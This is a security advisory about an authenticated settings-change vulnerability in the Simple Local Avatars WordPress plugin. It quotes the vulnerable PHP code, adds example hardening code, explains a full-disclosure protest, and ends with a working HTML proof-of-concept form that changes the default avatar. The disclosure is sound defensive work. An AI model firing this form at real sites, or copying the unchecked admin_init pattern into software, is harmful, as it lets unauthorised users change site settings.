Authenticated Settings Change Vulnerability in Simple Local Avatars by 10up
Last week, we saw what looked to be a hacker probing for usage of the WordPress plugin Simple Local Avatars (from 10up) by requesting the following file from it, across our websites and third-party data we monitor:
/wp-content/plugins/simple-local-avatars/readme.txt
The apparent hacker looks to be targeting other plugins with known exploitable vulnerabilities in older versions, so that might suggest the same for this plugin, but we couldn’t find any mention of older versions having a vulnerability hackers would target.
Doing some checking over the plugin, we found that the current version of it does have a vulnerability, though one that isn’t something hackers are known to target. The vulnerability allows those logged in to WordPress to change the default avatar shown by the plugin.
In the file /includes/class-simple-local-avatars.php, the plugin registers the function admin_init() to run during admin_init:
add_action( 'admin_init', array( $this, 'admin_init' ) );
That makes it accessible to even those not logged in to WordPress.
That function doesn’t do any security checks to limit access before beginning to run its code:
public function admin_init() {
	$this->define_avatar_ratings();
At the end of the function, it calls the function save_default_avatar_file_id():
	// Save default avatar file.
	$this->save_default_avatar_file_id();
}
That function updates the WordPress option (setting) simple_local_avatar_default to the submitted integer value, provided that the global variable $pagenow is options.php and the value is not empty:
private function save_default_avatar_file_id() {
	global $pagenow;

	$file_id = filter_input( INPUT_POST, 'simple-local-avatar-file-id', FILTER_SANITIZE_NUMBER_INT );

	// check for uploaded files
	if ( 'options.php' === $pagenow && ! empty( $file_id ) ) {
		update_option( 'simple_local_avatar_default', $file_id );
	}
}
That condition will be true for someone logged in to WordPress who accesses the page /wp-admin/options.php, even a low-level user who is shown the message “You need a higher level of permission.” when they access it.
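As an added illustration (not code from the plugin or its developer), the following shows how the save step could be gated so that only users allowed to manage options, submitting the settings form with a valid nonce, can change the default avatar. The nonce action name 'simple-local-avatars-default', the field name '_sla_nonce', and the function names are assumptions chosen for this example.

```php
<?php
// Hardened version of the save step described above (example code, not the
// plugin's own). Assumed names: 'simple-local-avatars-default' (nonce action),
// '_sla_nonce' (nonce field), sla_* function names.

// Emit the nonce field in the settings form next to the file-id input, so the
// check in sla_save_default_avatar_checked() has something to verify.
function sla_render_default_avatar_nonce() {
	wp_nonce_field( 'simple-local-avatars-default', '_sla_nonce' );
}

// Returns true only when the option was updated; false when any check fails.
function sla_save_default_avatar_checked() {
	global $pagenow;

	if ( 'options.php' !== $pagenow ) {
		return false;
	}

	// Any logged-in user can reach options.php; only users who may manage
	// options are allowed to change this setting.
	if ( ! current_user_can( 'manage_options' ) ) {
		return false;
	}

	// The request must carry a nonce issued to this settings form, which
	// also stops a forged cross-site POST from changing the option.
	$nonce = isset( $_POST['_sla_nonce'] ) ? sanitize_text_field( wp_unslash( $_POST['_sla_nonce'] ) ) : '';
	if ( ! wp_verify_nonce( $nonce, 'simple-local-avatars-default' ) ) {
		return false;
	}

	// Accept only a positive integer that refers to an existing attachment.
	$file_id = isset( $_POST['simple-local-avatar-file-id'] ) ? absint( $_POST['simple-local-avatar-file-id'] ) : 0;
	if ( $file_id <= 0 || 'attachment' !== get_post_type( $file_id ) ) {
		return false;
	}

	return update_option( 'simple_local_avatar_default', $file_id );
}
```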
WordPress Causes Full Disclosure
In protest of the continued inappropriate behavior of the moderators of the WordPress Support Forum, we changed from reasonable disclosure to full disclosure of vulnerabilities in plugins in the WordPress Plugin Directory until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about it for the developer through the WordPress Support Forum. (For plugins that are also in the ClassicPress Plugin Directory, we will follow our reasonable disclosure policy.)
You can notify the developer of this issue on the forum as well.
After four years, the moderators have finally tacitly admitted they were behaving inappropriately and have made moves to fix the problems (though incompletely), so these full disclosures can be ended if they simply restore access to our accounts and plugins in the Plugin Directory. Hopefully that takes less than four years.
Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:
Proof of Concept
The following proof of concept will cause the default avatar to be set to ID 1, when logged in to WordPress.
Replace “[path to WordPress]” with the location of WordPress.
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/options.php" method="POST">
<input type="hidden" name="simple-local-avatar-file-id" value="1" />
<input type="submit" value="Submit" />
</form>
</body>
</html>